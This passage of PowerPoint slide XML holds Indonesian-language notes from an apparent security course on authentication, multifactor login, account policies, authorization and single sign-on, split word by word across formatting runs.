              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek-subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tugas-tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web/mobile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembelajaran</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multifaktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>federasi</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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40919451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Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asumsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor-faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
